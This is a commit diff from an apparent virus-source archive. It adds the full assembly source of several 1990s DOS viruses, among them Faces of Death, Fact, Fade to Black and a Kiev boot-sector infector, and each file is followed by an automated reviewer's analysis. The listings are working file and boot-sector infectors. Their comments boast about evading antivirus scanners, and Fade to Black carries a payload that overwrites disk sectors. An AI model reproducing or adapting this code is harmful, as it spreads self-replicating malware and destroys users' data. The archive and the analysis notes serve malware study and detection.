re-organize

push
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
+246
@@ -0,0 +1,246 @@
; ------------------------------------------------------------------------------
;
; - Faces of Death -
; Created by Immortal Riot's destructive development team
; (c) 1994 The Unforgiven/Immortal Riot
;
; ------------------------------------------------------------------------------
; þ Undetectable COM-infector(s) with a neat pay-load system! þ
; ------------------------------------------------------------------------------
.model tiny
.radix 16
.code
org 100h
start:
first_gen_buffer db 00,00,00,00 ; for first generation only!
v_start:
entry_point:
mov sp,102h ; get the delta offset so tbscan cant
call get_delta ; flag it as flexible entry point
get_delta:
mov bp,word ptr ds:[100h]
mov sp,0fffeh
sub bp,offset get_delta
mov ax,0305h ; this code was included to avoid detection
xor bx,bx ; from tbscan. The vsafe disabeling code can
int 16h ; be used as well, but f-prot heuristics
; complains about it.
call en_de_crypt ; decrypt the virus
jmp short real_start ; and continue...
encrypt_value dw 0 ; random xor (encryption) value
write_virus:
call en_de_crypt ; write encrypted copy of the virus
mov ah,40 ;
mov cx,code_end-v_start ; # bytes
lea dx,[bp+v_start] ; dx:100h
int 21 ;
call en_de_crypt ; decrypt virus again for further processing
ret
en_de_crypt:
mov ax,word ptr [bp+encrypt_value]
lea si,[bp+real_start]
mov cx,(enc_end-real_start+1)/2
xor_loopie:
xor word ptr [si],ax ; encrypts two bytes/loop until all
inc si ; code between real_start and enc_end
inc si ; are encrypted
loop xor_loopie
ret
real_start:
cmp word ptr cs:[5dh],'?-' ; check for -? in the command line
jne chk_cond ; no valid virus option!
mov ah,9 ; tell them that i wrote the virus,
lea dx,[bp+offset v_name] ; and quit without infecting!
int 21h
int 20h
chk_cond:
mov ah,2ch ; get time of 1/100 of a second value from
int 21h ; the system clock
cmp dl,58 ; value == 58h (88d)
jne get_drive ; nope!
cr_file: ; value = 58h
mov ah,3ch ; create the file c:\dos\keyb.com
mov cx,0 ; Doh! One byte wasted!
lea dx,[bp+file_create]
int 21h
xchg ax,bx
mov ah,40h ; write the
mov cx,len ; 80hex virus,
lea dx,[bp+write] ; from this virus
int 21h ; to keyb.com
mov ah,3eh ; close file
lea dx,[bp+offset file_create] ; c:\dos\keyb.com
int 21h
jmp $ ; and hang
get_drive:
mov ah,19h ; get drive from where we are executed from
int 21h ; check if it's a: or b:
cmp al,2 ; if so, return control to the original
jb quit ; program without infecting other files
lea si,[bp+org_buf] ; copy the first four bytes of the file
mov di,100 ; (from di:100h) to org_buf
movsw ;
movsw ;
lea dx,[bp+code_end] ; set our own dta to code_end, so
call set_dta ; the paramters when findfiles arent
; destroyed
lea dx,[bp+direct_infect] ; if present, infect
call dirinfect ; \dos\edit.com
mov ah,4e ; search for com files
lea dx,[bp+com_files] ;
find_next:
int 21
jc no_more_files ; no more files find, exit!
call infect ; found a find, infect it!
mov ah,4f ; search next file
jmp short find_next ; and see if we find one
no_more_files: ;
mov dx,80 ; set the dta to 80h (default)
call set_dta ;
quit: ;
mov di,100 ; return control to original program
push di ;
ret
infect:
lea dx,[bp+code_end+1e] ; 1e = adress to filename in ds:dx in our
; new dta area!
dirinfect:
mov ax,3d02 ; open file
int 21 ; in read/write mode
jnc infect_it ; if the file \dos\edit.com doesnt exist
ret ; return, and search first comfile
infect_it:
xchg bx,ax ; filehandle in bx
mov ax,5700 ; get time/date
int 21
push dx ; save date
push cx ; save time
mov ah,3f ; read the first four bytes
mov cx,4 ; of the file to org_buf
lea dx,[bp+org_buf]
int 21
cmp byte ptr [bp+org_buf+3],07h ; previous infected
jz finish_infect ;
cmp word ptr [bp+org_buf],9090h ; double nop
jz finish_infect ;
cmp word ptr [bp+org_buf],5a4dh ; ZM (exe file)
jz finish_infect ;
cmp word ptr [bp+org_buf],4d5ah ; MZ (exe-file)
jz finish_infect ;
cmp byte ptr [bp+org_buf+1],6Dh ; command.com
jz finish_infect ;
mov ax, word ptr [bp+code_end+1ah] ; <1000 bytes
cmp ax,1000d ;
jb finish_infect
cmp ax,64000d ; >64000 bytes
ja finish_infect ;
mov ax,4202 ; move file-pointer
xor cx,cx ; to end of file
cwd
int 21
sub ax,3 ; substract bytes
mov word ptr [bp+first_four+1],ax ; to our own jump
get_value:
mov ah,2ch ; get system clock for
int 21h ; 1/100 of a second
jz get_value ; if zero = get new value
add ax,3 ; this will be used for
mov word ptr [bp+encrypt_value],dx ; the xor-value
call write_virus ; write virus to end of file
mov ax,4200 ; move file-pointer to
xor cx,cx ; top of file
cwd
int 21
mov ah,40 ; write our own jump
mov cx,4 ; instruction to the
lea dx,[bp+first_four] ; beginning
int 21
finish_infect:
mov ax,5701 ; set back
pop cx ; time
pop dx ; date
int 21 ;
mov ah,3e ; close file
int 21
ret ; return and continue!
set_dta:
mov ah,1a ; code to set the disk transfer area
int 21 ;
ret
v_name db "Faces of Death - (c) 1994 The Unforgiven/Immortal Riot$"
direct_infect db '\DOS\EDIT.COM',0
file_create db 'c:\dos\keyb.com',0
write db "þJÄNºJÍ!s´,Í!úOr°¹
endwrite:
len equ endwrite-write
com_files db '*.com',0
first_four db 0e9,90,90,07 ; buffer to calculate the new entry
org_buf db 90,90,0CDh,20 ; buffer to save the first four bytes
enc_end:
code_end:
end start
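Review bot: The `.radix 16` directive near the top is undocumented, and the listing mixes `int 21h` with `int 21` and hex-by-default literals (`mov ah,40`, `cmp dl,58`, `mov di,100`) with explicit decimals (`1000d`, `64000d`); a comment beside the directive such as `; all unsuffixed literals below are hex; decimal uses the d suffix` would keep an analyst from misreading the DOS function numbers. For detection it is worth recording next to `first_four` that an infected host starts with `E9 xx xx 07`, since that fourth byte is what the `cmp byte ptr [bp+org_buf+3],07h` check keys on. The code from `v_start` through `en_de_crypt` lies outside the XOR range (`real_start`..`enc_end`), so that stub is stored in clear in every copy that `write_virus` emits. The `write` string is cut off in this rendering, so the bytes dropped into `c:\dos\keyb.com` cannot be reviewed from this page.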
@@ -0,0 +1,37 @@
Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
load and/or execute program by overwriting the infected file.
Compile Fact with Turbo Assembler v 4.0 by typing:
TASM /M FACT.ASM
TLINK /t /x FACT.OBJ
.model tiny
.code
org 100h
code_begin:
mov ax,3521h ; Get interrupt vector 21h
int 21h
mov word ptr [int21_addr],bx
mov word ptr [Int21_addr+02h],es
mov ah,25h ; Set interrupt vector 21h
lea dx,int21_virus ; DX = offset of int21_virus
int 21h
xchg ax,dx ; DX = number of bytes to keep res...
int 27h ; Terminate and stay resident!
int21_virus proc near ; Interrupt 21h of Fact
cmp ah,4bh ; Load and/or execute program?
jne int21_exit ; Not equal? Jump to int21_exit
mov ax,3d01h ; Open file (write)
int 21h
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
lea dx,code_begin ; DX = offset of code_begin
int21_exit:
db 0eah ; JMP imm32 (opcode 0eah)
code_end:
int21_addr dd ? ; Address of interrupt 21h
virus_name db '[Fact]' ; Name of the virus
endp
end code_begin
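Review bot: The description at the top does not say which bytes actually land in an overwritten file: the write length is `code_end-code_begin` and `virus_name db '[Fact]'` is declared after `code_end`, so the name string is outside the written range and a signature keyed on it would match only this original program. A comment on `virus_name` such as `; outside code_end-code_begin, not written to overwritten files` would record that. Because the handler opens the program being loaded and writes over its start rather than appending, affected files cannot be disinfected and have to be restored from a clean copy.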
+343
@@ -0,0 +1,343 @@
; VirusName: Fade to Black
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-29-1993
;
; This is a mutation of Creeping Tormentor, whick was discovered
; in Feb 1992. The origin is "unknown" (attention Patricica), it's
; written in Sweden by Tormentor / Demoralized Youth
; Many thanx goes to Tormentor for the original code.
;
; This is a Parasite, Resident, Appending COM-files infector.
; Searches for the string sUMsDos (?) in memory.
; search for Jerusalen, and if it's locate it, crash the HD.
;
; This will just fine, and
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
;
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
;
; Best Regards : [Metal Militia]
; [The Unforgiven]
code segment byte public
assume cs:code, ds:code, es:code, ss:code
org 100h
codebeg:
mov ax,0700h ; Remove virus from code!
int 21h ;^-- Scan string (before it was ax,043FFh)
; Let's allocate some mem!
mov ax,ds
sub ax,11h
mov ds,ax
cmp byte ptr ds:[0100h],5Ah
jnz skip
mov ax,ds:[0103h]
sub ax,40h
jb skip
mov ds:[0103h],ax
sub word ptr ds:[0112h],50h
mov es,ds:[0112h]
push cs
pop ds
mov cx,code_end-codebeg
mov di,100h
push di
mov si,di
rep movsb
push es
pop ds
mov ax,351Ch
int 21h
mov word ptr ds:[int1Cret],bx
mov word ptr ds:[int1Cret+2],es
mov al,21h
int 21h
mov word ptr ds:[real21+1],bx
mov word ptr ds:[real21+3],es
mov ah,25h
mov dx,offset int21beg
int 21h
mov al,1Ch
mov dx,offset int1Cnew
int 21h
push cs
push cs
pop es
pop ds
ret
skip: int 20h
int21beg: push ax
sub ax,4B00h
jz infect
pop ax
cmp ax,0700h ; Check if ....
jne real21
mov ax,word ptr ds:[retdata]
mov si,ax
mov di,100h
mov cx,code_end-codebeg
rep movsb
mov ax,100h
pop cx
pop cx
push es
push ax
iret
real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec.
retdata: db 00h, 00h
f_time: dw 0000h
f_date: dw 0000h
infect: pop ax
push ax
push bx
push cx
push di
push ds
push dx
push si
mov ah,43h ; Get file attr.
int 21h
mov ax,4301h
and cx,0FEh ; Strip the Read-only-flag
int 21h
mov ax,3D02h ; Open victim.
int 21h
xchg ax,bx
call sub_2
sub_2: mov di,sp ; God what I hate that Eskimo!
mov si,ss:[di]
inc sp
inc sp
push cs
pop ds
mov ax,5700h ; Get file's time and date
int 21h
mov [si-(sub_2-f_time)],cx
mov [si-(sub_2-f_date)],dx ; And save them...
mov ah,3Fh ; Read X byte from begin.
mov cx,code_end-codebeg
add si,code_end-sub_2 ; SI points to EOF
mov dx,si
int 21h
cmp word ptr [si],'MZ' ; Mark Zimbowski? (EXE?)
je close
cmp word ptr [si],'ZM' ; Zimbowski Mark? (EXE?)
je close
mark: cmp word ptr [si+(mark-codebeg+4)],'½¾' ; infected?
je close
call put_eof ; move file ptr to EOF
cmp ax,(0FFFFh-(code_end-codebeg)-100h)
ja close
cmp ax,code_end-codebeg+100h
jb close
add ax,100h
mov word ptr ds:[si-(code_end-retdata)],ax
mov ah,40h ; Flytta (move) beg to end.
mov cx,code_end-codebeg
mov dx,si
int 21h
mov ax,4200h ; fptr to filbeg.
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ; Write virus to beg.
mov cx,code_end-codebeg
mov dx,si
sub dx,cx
int 21h
close: mov ax,5701h
mov cx,[si-(code_end-f_time)]
mov dx,[si-(code_end-f_date)]
int 21h
mov ah,3Eh
int 21h ; close file, bx=file handle
pop si
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp real21
put_eof: mov ax,4202h
xor dx,dx
xor cx,cx
int 21h
ret
int1Cnew:
push ax
inc byte ptr cs:[counter]
mov al,30h
cmp byte ptr cs:[counter],al
jz scan
pop ax
quit: jmp dword ptr cs:[int1Cret]
scan:
push bx
push cx
push di
push ds
push dx
push es
push si
push cs
pop ds
cld
xor bx,bx
mov byte ptr cs:[counter],bh
mov cx,0FA0h
mov ax,0b800h
mov es,ax
xor di,di
again: mov al,byte ptr cs:[text+bx]
sub al,80h
repnz scasb
jnz stick
maybe: inc di
inc bx
cmp bx,10d
jz beep
mov al,byte ptr cs:[text+bx]
sub al,80h
scasb
jz maybe
xor bx,bx
jmp again
beep:
xor cx,cx
mov bx,word ptr cs:[int1Cret]
mov es,word ptr cs:[int1Cret+2]
mov ax,251Ch
int 21h
overagain: mov dx,0180h
xor bx,bx
reset: mov ah,00h
inc bx
cmp bl,5h
jz raise
inc cx
int 13h
hoho: mov ax,0380h
inc cx
int 13h
jc reset
jmp hoho
raise: xor cx,cx
xor bx,bx
inc dx
cmp dl,85h
jnz hoho
jmp overagain
stick:
pop si
pop es
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp quit
counter: db 00h
text: db 's'+80h, 'U'+80h, 'M'+80h, 's'+80h, 'D'+80h, 'o'+80h
db 's'+80h
; This is what it scans the screen for --^ sUMsDos
; just a little bit cryptic eh ?
int1Cret: db 0EAh, 00h, 00h, 00h, 00h
code_end: ; THE END.
; This isn't really a bullshit note, this is a Metallica Note ;)
; which means quality! Metal Up Your Ass!
bullshit_note db "Metal Militia / Immortal Riot "
DB "Fade To Black "
DB "Things not what they used to be "
DB "Missing one inside of me "
DB "Deathly lost, this can't be real "
DB "Cannot stand this hell I feel... "
code ends
end codebeg
; Think that would be it..
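Review bot: The header comment only says the payload will "crash the HD", which undersells what the `beep`/`overagain`/`hoho` block does: it loops `int 13h` with `ax=0380h` (BIOS write) while stepping `dl` from 80h towards 85h, i.e. raw sector writes to the fixed disks. The trigger is the `int1Cnew` timer hook finding the bytes stored at `text` (each minus 80h) in video segment 0B800h. A comment above `beep:` along the lines of `; destructive payload: BIOS sector writes to fixed disks 80h-84h, triggered by on-screen text match` would make the impact clear for triage. For identification, the resident `int21beg` handler special-cases `ax=0700h`, the same call issued at `codebeg`.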

@@ -0,0 +1,81 @@
code segment'code'
assume cs:code, ds:code, ss:code, es:code
org 100h
dta equ endcode + 10
fatmanid equ 34
start:
jmp virus
hoststart:
db 90h,90h,90h ;NOP
db 0cdh,020h,1ah,1ah ;INT 20
hostend:
virus:
call $ + 2
fatman:
pop bp ;Search for next files
sub bp,offset fatman
mov ah,1ah
lea dx,[bp +dta]
int 21h
mov ah,4eh
lea dx,[bp + filespec]
xor cx,cx
fileloop:
int 21h
jc quit
mov ax,3d02h ;Open file read and write
lea dx,[bp + offset dta + 30] ;Move the offset of filename
int 21h ;into dx register
jc quit
xchg bx,ax
mov ah,3fh ;read from file
mov cx,4 ;read 4 bytes off file
lea dx,[bp + orgjmp] ;store the 4 bytes
int 21h
mov ax,4202h ;point to end of file
xor cx,cx
xor dx,dx
int 21h
sub ax,03h ;Back three bytes from org
mov [bp + newjmp + 2], ah ;high location
mov [bp + newjmp + 1], al ;low location
mov [bp + newjmp + 3], fatmanid;his ID
mov ah,0e9h ;JMP
mov [bp + newjmp],ah
mov ah,40h ;write to file
mov cx,endcode - virus
lea dx,[bp + virus]
jc quit
mov ax,4200h ;Moving to TOP of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;writing 4 bytes to top of file
mov cx,4
lea dx,[bp + offset newjmp]
int 21h
mov ah,1ah
mov dx,080h
int 21h
quit:
lea si,[bp + offset thisjmp]
mov di,0100h
mov cx,04h
cld
rep movsb
mov di,0100h
jmp di
filespec db '*.COM',0
orgjmp db 4 dup (?)
newjmp db 4 dup (?)
thisjmp db 4 dup (?)
oldjmp db 09h,0cdh,020h,90h
endcode:
code ends
end start
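Review bot: This listing has no header comment at all, unlike the neighbouring files, so nothing identifies the sample or its marker. From the code, the host's first four bytes are replaced with the `newjmp` buffer: `0e9h`, a 16-bit offset, and `fatmanid` (`equ 34`, decimal since no radix is set); a header such as `; Fatman - COM infector, marker byte 34 (22h) at host offset 3` would give analysts something to match on. The search is `*.COM` in the current directory with attribute mask 0, which is worth stating in the same header.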
+577
@@ -0,0 +1,577 @@
;
; ÜÜ Û
; ßßß Virus Magazine Û Box 176, Kiev 210, Ukraine IV 1997
; ßÛÛ ßßßßßßßßßßßßßßßß Û ßßßßßßßßßßßßßßßßßßß ß ßßßßÞßßß ÛßßßßßßÛ
; ÞÛ ÛßÜ Ûßß Üßß Üßß ÜÛÜ Üßß ÛßÛ Ý Û ÜßÛ Û Üßß ÛÜÜ Û Û Û Û
; Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û Û Û Û Û Û
; Û Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜÜ Û Û Û Û
; Þ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÛÜÜÜÜÜÜÛ
; (C) Copyright, 1994-97, by STEALTH group WorldWide, unLtd.
;
;-------------------------------------------------------------------------
; MCE-Len*512
; ‚¨àãá § à ¦ ¥â COM ¨ EXE ä ©«ë ¯à¨ ¨å á®§¤ ­¨¨
; (â®ç­¥¥ ¯à¨ § ªàë⨨ ­®¢®á®§¤ ­­®£® ä ©« ).
; ’ ª¦¥ § à ¦ ¥âáï § £àã§®ç­ë© ᥪâ®à ¯¥à¢®£® «®£¨ç¥áª®£® ¤¨áª  ­  ¯¥à¢®¬
; HD. (ï à¥è¨« ­¥ ®¯à¥¤¥«ïâì ¤¥©á⢨⥫ì­ë© á¨á⥬­ë© ¤¨áª - «¥­ì
; ¢®§¨âìáï!!!)
; ‚ ¯ ¬ïâì ¨­áâ «¨à㥬áï ’Ž‹œŠŽ ¯à¨ ¯¥à¥§ £à㧪¥ ¬ è¨­ë.
; ਠ§ ¯ã᪥ ¯à®£à ¬¬ë ä-樥© 4B00h ¢¨àãá «¥ç¨â § £àã§®ç­ë© ᥪâ®à.
; ਠ¨á¯®«­¥­¨¨ ä-樨 4Cxxh § £àã§®ç­ë© ᥪâ®à § à ¦ ¥âáï á­®¢ !!!
;
; „ ­­ë© ⥪áâ ­¥ ¯à®å®¤¨« ®¯â¨¬¨§ æ¨î...Sorry.
;-------------------------------------------------------------------------
.model tiny
.code
;-------------------------------------------------------------------------
len equ 4 ; Len virus in sectors (include boot part)
;////////////////////////////////////////////////////
; Start BOOT part (installer for Dos part...)
org 0
;////////////////////////////////////////////////////
BootStart:
jmp BootCode
;--------------------------------------------------------------
BootData db 40h dup (0) ; Data for boot sector.
;--------------------------------------------------------------
BEEP:
push ax
mov ax,0e07h
int 10h
pop ax
ret
BootCode:
nop
nop
cli
xor di,di
mov si,7C00h
mov bx,si
mov ds,di
mov ss,di
mov sp,si
sti
;
int 12h
sub ax,96 ; - 96 kb.
mov cl,6
shl ax,cl
mov es,ax ; ES = segment for our body
;
cld
mov cx,512
rep movsb ; Transmit body
;
push ax
mov ax,offset BootInstall
push ax
retf
;-------------------------------------------------------------
BootInstall:
mov si,1Ch*4
push si
lea di,OldTimerAddr
movsw
movsw
;
cli
pop di
mov word ptr ds:[di],offset TimerManager
mov word ptr ds:[di+2],es
sti
;
push ds
pop es
mov ax,0201h
mov cx,0009
mov dx,0080h
push es
push bx
int 13h
retf
;-------------------------------------------------------------
OldTimerAddr dw 0,0
;-------------------------------------------------------------
TimerManager:
push ds es ax bx di si
;
xor ax,ax
mov es,ax
mov ds,ax
;
mov ax,ds:[(21h*4)+2]
cmp ah,08
ja ExitTimer
mov cs:Seg21h,ax
mov ax,ds:[21h*4]
mov cs:Ofs21h,ax
;
mov word ptr ds:[21h*4],offset InstallDosManager
mov ds:[(21h*4)+2],cs
;
push cs
pop ds
lea si,OldTimerAddr
mov di,1Ch*4
cld
movsw ; Return old timer procedure
movsw
ExitTimer:
pop si di bx ax es ds
iret
;-------------------------------------------------------------
InstallDosManager:
cmp ax,4B00h
jz FullInstall
;
OldDosManager:
db 0EAh
Ofs21h dw 0
Seg21h dw 0
;
;---------------------------------------------------
i21h:
pushf
call dword ptr cs:[offset Ofs21h]
ret
;---------------------------------------------------
FullInstall:
push ax bx cx dx si di es ds
;
push cs
pop ds
;
mov ah,48h
mov bx,4096/16
int 21h ; AX = Segment of new area for virus
jc NoInstalled
;
mov es,ax
xor si,si
mov di,si
;
cld
mov cx,512
mov bx,cx
rep movsb
;
dec ax
mov ds,ax
mov word ptr ds:[01],0070h ; MSDOS segment
;
mov ds,cx
;
mov ax,0204h ; Read 4 sectors (2 kb)
mov cx,0010 ; (virus body - without current part)
mov dx,0080h
int 13h
;
mov word ptr ds:[21h*4],offset VirusDosManager
mov ds:[(21h*4)+2],es
;
call BEEP ;*****************************<<<<<<<<<<
;
NoInstalled:
pop ds es di si dx cx bx ax
jmp OldDosManager
;-------------------------------------------------------------
org 510
db 55h,0AAh ; 'Uª'
;-------------------------------------------------------------
;/////////////////////////////////////////////////////////////
; Start Dos TSR file infector.
org 512
;/////////////////////////////////////////////////////////////
VirusDosManager:
cmp ax,0FFAAh ; Our copy call us
jnz LookNextFun
stc ; CY=1
retf 2
LookNextFun:
cmp ah,4Ch
jnz LookRunFun
jmp ExitProg
LookRunFun:
cmp ax,4B00h
jnz LookCREATE
jmp RunProg
LookCREATE:
cmp cs:Fhandle,0 ; <>0 then file processed!!!
jnz LookCloseOurFile
;
cmp ah,3Ch ; Create
jz OurFun
cmp ah,5Bh ; Create
jz OurFun
ExitVDM:
jmp OldDosManager
;-----------------------------------------------------
LookCloseOurFile:
cmp ah,3Eh ; Close
jnz ExitVDM
cmp cs:Fhandle,bx
jnz ExitVDM
jmp InfectClosedFile
;-----------------------------------------------------
OurFun:
push ax si
;
cld
mov si,dx
LookNULL:
lodsb
cmp al,'.'
jnz LookNULL
lodsw
;
or ax,2020h ; ' '
cmp ax,'xe' ; EXe
jnz LookCOM
lodsb
or al,20h
cmp al,'e' ; exE
jnz NoOurEXT
mov Ftype,1
jmp GetHandle
LookCOM:
cmp ax,'oc' ; COm
jnz NoOurEXT
lodsb
or al,20h
cmp al,'m' ; coM
jnz NoOurEXT
mov Ftype,2
GetHandle:
mov si,dx
push bp
mov bp,dx
LookTild:
lodsb
cmp al,0
jz LookFileName
cmp al,'\'
jnz LookTild
mov bp,si
jmp LookTild
LookFileName:
mov si,bp
pop bp
lodsw
or ax,2020h
cmp ax,'rd' ; DRweb
jz NoOurEXT
cmp ax,'ia' ; AIdstest
jz NoOurEXT
cmp ax,'da' ; ADinf
jz NoOurEXT
cmp ax,'sm' ; MScan
jz NoOurEXT
;
pop si ax
call i21h ; int 21h
mov cs:Fhandle,ax
jnc e1
mov cs:Fhandle,0
e1:
retf 2
NoOurEXT:
pop si ax
jmp ExitVDM
;---------------------------------------------------------
bootCX dw 0
bootDX dw 0
;---------------------------------------------------------
InfectClosedFile:
push ax bx cx dx es ds si di bp
;
push cs
pop ds
call InfectFile
;
pop bp di si ds es dx cx bx ax
;
jmp OldDosManager
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
FileInstaller:
call $+3
pop bp
sub bp,03
mov ax,0FFAAh
int 21h
jc ExitFileInstall
cmp al,0
jnz ExitFileInstall
push es ds
call InstallVirus_to_PC
pop ds es
ExitFileInstall:
cmp word ptr cs:[bp][offset OriginBytes-offset FileInstaller],'ZM'
jz L_exe
;-Loaded from com file.-------------------------------------------
mov di,100h
lea si,[bp][offset OriginBytes-offset FileInstaller]
push di
movsw
movsw
movsb
ret ; Go to infected com program.
;----------------------------
OriginBytes Label Byte
mov ax,4c00h
int 21h
db 20h dup (90h)
;----------------------------
;-Loaded from exe file.--------------------------------------------
L_exe:
mov ax,es
add ax,10h
push ax
add cs:[bp][offset CS_file-offset FileInstaller],ax
pop ax
SS_file: add ax,0000
cli
mov ss,ax
SP_file: mov sp,0000
sti
db 0eah
IP_file dw ?
CS_file dw ?
;-------------------------------------------------------------------
InstallVirus_to_PC:
push cs
pop ds
mov ax,0B900h ; 3 page of videobuffer
mov es,ax
xor bx,bx
;
mov ax,0201h ; READ MBR
mov cx,1
mov dx,80h
int 13h ; ES:BX = B900:0000h
;
jnc ReadOk
OurBoot:
ret
ReadOk:
; cmp byte ptr es:[bx+01BEh],80h ; Bootable disk ?
mov cx,es:[bx+01C0h] ; sect,cyl
mov dh,es:[bx+01BFh] ; head
;
mov ds:[bp][(offset FIend-offset FileInstaller)+offset bootCX],cx
mov ds:[bp][(offset FIend-offset FileInstaller)+offset bootDX],dx
;
mov ax,0201h ; READ BOOT on drive C:\
int 13h
cmp word ptr es:[bx+offset BootCode],9090h
jz OurBoot ; Already infected!!!
;
push cx dx
;
mov ax,0301h ; WRITE OLD BOOT to unuseble section
mov dx,80h
mov cx,9
int 13h
;
push es ds
pop es ds
cld
mov si,offset BootData
lea di,[bp+si][offset FIend-offset FileInstaller]
mov cx,40h
rep movsb ; Copy origin Boot Data to Virus Boot Data
;
push cs
pop ds
lea bx,[bp][offset FIend-offset FileInstaller+512]
;
mov ax,0304h ; WRITE VIRUS BODY
mov cx,10
int 13h
;
sub bx,512
mov ax,0301h ; WRITE VIRUS BOOT SECTOR in system area
pop dx cx
int 13h
ret
;---------------------------------------------------------
FIend label byte
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
; ENTER : BX = File Handle
; EXIT : File not CLOSED!!! , Fhandle = 0
InfectFile:
call diskryptor
mov ah,3fh
mov cx,18h
mov dx,offset OriginBytes
mov si,dx
int 21h
jc _1
cmp word ptr ds:[offset OriginBytes],'ZM'
jz _EXE
cmp word ptr ds:[offset OriginBytes+3],'::'
jz _1
;-Infect .COM --------------------------------
cmp bp,(65500-(512*Len))
ja _1 ;„«¨­  ¡®«ìè¥ ¤®¯ãá⨬®©.
mov es:[di+21],bp ;F.p. = end file.
;-Make JMP------------------------------------
sub bp,03
mov ds:[offset jmp_n],bp
call WriteBody
jc _1b
mov cx,05h
mov dx,offset new_3_byte
ExitWrite:
mov ah,40h
int 21h
_1b: jmp exit_date
_1: ret
;-Infect .EXE ---------------------------------
_EXE:
cmp ds:[si+12h],'::' ; Already infected ?
jz _1 ; Yes!
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; DX:AX = File len from header.
cmp ax,bp ; Real file len = dx:ax ?
jnz _1 ; No - this is overlay.
cmp es:[di+19],dx ; ********************
jnz _1 ; No - this is overlay.
;-----
mov es:[di+21],ax ; F.p.= end file.
mov es:[di+23],dx
;-Get header.-----------------------------------
mov [si+12h],'::'
mov ax,[si+14h]
mov ds:[offset IP_file],ax
mov ax,[si+16h]
mov ds:[offset CS_file],ax
mov ax,[si+10h]
mov word ptr ds:[offset SP_file+1],ax
mov ax,[si+0eh]
mov word ptr ds:[offset SS_file+1],ax
;-----------------------------------------------
xchg ax,bp
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+0eh],ax ; ReloSS
mov [si+14h],dx ; ExeIP.
mov [si+10h],4096 ; ExeSP
;-Correcting file len in header.----------------
add word ptr [si+4],len ; Newlen=OldLen+(512*len)
;-Write virus in file.--------------------------
call WriteBody
jc exit_date
;-Write new header.-----------------------------
mov cx,18h
mov ah,40h
mov dx,offset OriginBytes
int 21h
exit_date:
mov ax,5701h
mov cx,es:[di+13]
mov dx,es:[di+15]
int 21h
ret
;----------------------------------------------
WriteBody proc
mov Fhandle,0
mov dx,offset FileInstaller
mov cx,(offset FIend - offset FileInstaller)
mov ah,40h
int 21h
xor dx,dx
mov cx,512*len
mov ah,40h
int 21h
mov es:[di+21],dx ; F.p.= start file.
mov es:[di+23],dx ;
ret
WriteBody endp
;----------------------------------------------
diskryptor proc
mov ax,1220h
push bx
int 2fh
mov bl,es:[di]
mov ax,1216h
int 2fh
pop bx
mov byte ptr es:[di+2],02 ; mode = r/w.
xor dx,dx
mov es:[di+21],dx ; F.p.= end file.
mov es:[di+23],dx ; F.p.= end file.
mov bp,es:[di+17]
ret
diskryptor endp
;-----------------------------------------------
Ftype db 0 ; 1 - EXE ; 2 - COM
Fhandle dw 0 ; Handle of this file or 0000 for NoFile
;-----------------------------------------------
new_3_byte db 0e9h
jmp_n dw 0000
db '::'
;---------------------------------------------------------
ExitProg:
push ax bx cx dx es cs
pop es
;
mov ax,0301h
mov cx,cs:bootCX
mov dx,cs:bootDX
xor bx,bx
int 13h
;
pop es dx cx bx ax
jmp ExitVDM
;---------------------------------------------------------
RunProg:
push ax bx cx dx es cs
pop es
;
mov ax,0201h ; READ ORIGIN BOOT
mov cx,0009
mov dx,0080h
lea bx,Buffer
int 13h
;
mov ax,0301h ; WRITE ORIGIN BOOT TO ¥£® ORIGIN PLACE
mov cx,cs:bootCX
mov dx,cs:bootDX
int 13h
;
pop es dx cx bx ax
jmp ExitVDM
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
db '(c) Light General.Kiev.KIUCA.1996.NOT for free use.',0
db '(®¡ª ï ¯®¯ë⪠ ®¯ãáâ¨âì €¤¨­ä...€¤®«ìä...‰®á¨ä...ƒ“‹€ƒ...A€aa )',0
;---------------------------------------------------------
Header db 20h dup (?)
Buffer db 512 dup (?)
;----------------------------------------------------------------------
Virus1stInstaller:
mov ax,offset FIend-offset FileInstaller
xor bp,bp
sub bp,ax
call InstallVirus_to_PC
mov ax,4c00h
int 21h
;-----------------------------------------------------------------------
.stack 1024
end Virus1stInstaller
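Review bot: The descriptive comment block at the top of this file is mojibake (it looks like CP866 Cyrillic decoded in a Latin code page, as do a few inline comments and the second `db` string near the end), so the file has no readable description of what it leaves on disk. An English header should record what the code shows: `InstallVirus_to_PC` saves the original boot sector of the first partition on drive 80h to cylinder 0, head 0, sector 9, writes four sectors of body starting at sector 10, and replaces the boot sector itself; infected boot code is recognised by the two `nop`s at `BootCode` (9090h), COM hosts by `'::'` at offset 3 and EXE hosts by `'::'` at header offset 12h. The resident copy identifies itself by returning with carry set on `int 21h` `ax=0FFAAh`. That layout is what recovery depends on, since `RunProg` itself reads sector 9 to put the original boot sector back.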
@@ -0,0 +1,9 @@
Start Stop Length Name Class
00000H 007B4H 007B5H _TEXT CODE
007B6H 007B6H 00000H _DATA DATA
007C0H 00BBFH 00400H STACK STACK
Program entry point at 0000:07A6
@@ -0,0 +1,120 @@
;
; Feeblemind
